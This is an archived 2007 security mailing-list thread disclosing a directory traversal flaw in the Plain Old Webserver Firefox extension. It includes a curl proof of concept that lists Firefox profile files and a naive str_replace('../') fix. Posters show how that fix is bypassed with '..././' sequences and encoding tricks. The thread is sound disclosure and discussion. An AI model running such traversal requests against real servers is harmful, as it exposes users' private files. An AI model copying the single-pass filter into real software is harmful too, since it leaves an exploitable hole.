Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension

2007-02-23 Thread Matthew Flaschen 
Stefano Di Paola wrote:
> Plain Old Web Server 
> Good  Old Dir Traversal
> 
> curl "127.0.0.1:6670/../../../../" -kivvv
> * About to connect() to 127.0.0.1 port 6670
> *   Trying 127.0.0.1... connected
> * Connected to 127.0.0.1 (127.0.0.1) port 6670
>> GET /../../../../ HTTP/1.1

Yep, I think it's just a rite of passage for all web servers.

Matthew Flaschen



signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension

2007-02-12 Thread Billy Hoffman 
All depends on in the request processing you apply the fix. Its possible
that URL Decoding hasn't occuried yet, whereby I can bypass your filter
pretty easily. Not to mention Unicode...

Billy Hoffman
--
Lead Researcher, SPI Labs
SPI Dynamics Inc. - http://www.spidynamics.com
Phone:  678-781-4800
Direct:   678-781-4845

-Original Message-
From: ascii [mailto:[EMAIL PROTECTED] 
Sent: Friday, February 09, 2007 7:29 PM
To: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
Subject: Re: [WEB SECURITY] Plain Old Webserver - The coolest firefox
extension

pdp (architect) wrote:
> hei man, this is not a news :)

hehe, the maintainer should update the changelog with
this feature then :-)

i suggest this fix for the directory traversal bug

path = str_replace('../', '', path);

regards,
Francesco 'ascii' Ongaro
http://www.ush.it/

..././..././..././..././
how can't you love funsec?



Join us on IRC: irc.freenode.net #webappsec

The Web Security Mailing List: 
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension

2007-02-12 Thread Giorgio Fedon 

I thing that there is an implicit joke in the previous post...

"..././..././..././..././"
how can't you love funsec?

path = str_replace('../', '', path);

Becomes "../../../../" again...

GF
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension

2007-02-12 Thread ascii 
Billy Hoffman wrote:
> All depends on in the request processing you apply the fix. Its
> possible that URL Decoding hasn't occuried yet, whereby I can bypass
> your filter pretty easily. Not to mention Unicode...

hehehe i was waiting for this : )

remember: this is funsec

the bypass for the filter is in the signature of the same mail

> path = str_replace('../', '', path);
>
> regards,
> Francesco 'ascii' Ongaro
> http://www.ush.it/
>
> ..././..././..././..././
> how can't you love funsec?

cause ..././..././..././..././ becomes ../../../../ since the replace is
applied only once. simple logic trick, no encoding at all

see you,
Francesco 'ascii' Ongaro
http://www.ush.it/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension

2007-02-10 Thread pdp (architect) 
hei man, this is not a news :)

On 2/9/07, Stefano Di Paola <[EMAIL PROTECTED]> wrote:
> Plain Old Web Server
> Good  Old Dir Traversal
>
> curl "127.0.0.1:6670/../../../../" -kivvv
> * About to connect() to 127.0.0.1 port 6670
> *   Trying 127.0.0.1... connected
> * Connected to 127.0.0.1 (127.0.0.1) port 6670
> > GET /../../../../ HTTP/1.1
> > User-Agent: HackTheHacker(tm)
> > Host: 127.0.0.1:6670
> > Accept: */*
> >
> < HTTP/1.1 200 OK
> HTTP/1.1 200 OK
> < Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT;
> path=/;
> Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/;
> < Content-Type: text/html
> Content-Type: text/html
> < pow_server: POW/0.0.7
> pow_server: POW/0.0.7
> < Content-Location: /../../../../
> Content-Location: /../../../../
> < Content-Length: 280
> Content-Length: 280
>
> 
> firefox/
> bookmarks.html
> appreg
> default/
> pluginreg.dat
> * Connection #0 to host 127.0.0.1 left intact
> * Closing connection #0
>
>
> A new motto is on the way:
> HackTheHacker (ascii (tm))
>
> :)
>
> Cheers,
> Stefano
>
> Il giorno ven, 09/02/2007 alle 16.23 +, pdp (architect) ha scritto:
> > http://www.gnucitizen.org/blog/plain-old-webserver
> >
> > Must have Firefox Extension that allows you to do all sorts of crazy stuff.
> >
> > https://addons.mozilla.org/firefox/3002/
> >
> --
> ...oOOo...oOOo
> Stefano Di Paola
> Software & Security Engineer
>
> Web: www.wisec.it
> ..
>
>


-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension

2007-02-09 Thread ascii 
pdp (architect) wrote:
> hei man, this is not a news :)

hehe, the maintainer should update the changelog with
this feature then :-)

i suggest this fix for the directory traversal bug

path = str_replace('../', '', path);

regards,
Francesco 'ascii' Ongaro
http://www.ush.it/

..././..././..././..././
how can't you love funsec?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension

2007-02-09 Thread Stefano Di Paola 
Plain Old Web Server 
Good  Old Dir Traversal

curl "127.0.0.1:6670/../../../../" -kivvv
* About to connect() to 127.0.0.1 port 6670
*   Trying 127.0.0.1... connected
* Connected to 127.0.0.1 (127.0.0.1) port 6670
> GET /../../../../ HTTP/1.1
> User-Agent: HackTheHacker(tm)
> Host: 127.0.0.1:6670
> Accept: */*
> 
< HTTP/1.1 200 OK
HTTP/1.1 200 OK
< Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT;
path=/;
Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/;
< Content-Type: text/html
Content-Type: text/html
< pow_server: POW/0.0.7
pow_server: POW/0.0.7
< Content-Location: /../../../../
Content-Location: /../../../../
< Content-Length: 280
Content-Length: 280


firefox/
bookmarks.html
appreg
default/
pluginreg.dat
* Connection #0 to host 127.0.0.1 left intact
* Closing connection #0


A new motto is on the way:
HackTheHacker (ascii (tm))

:)

Cheers,
Stefano

Il giorno ven, 09/02/2007 alle 16.23 +, pdp (architect) ha scritto:
> http://www.gnucitizen.org/blog/plain-old-webserver
> 
> Must have Firefox Extension that allows you to do all sorts of crazy stuff.
> 
> https://addons.mozilla.org/firefox/3002/
> 
-- 
...oOOo...oOOo
Stefano Di Paola
Software & Security Engineer

Web: www.wisec.it
..

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/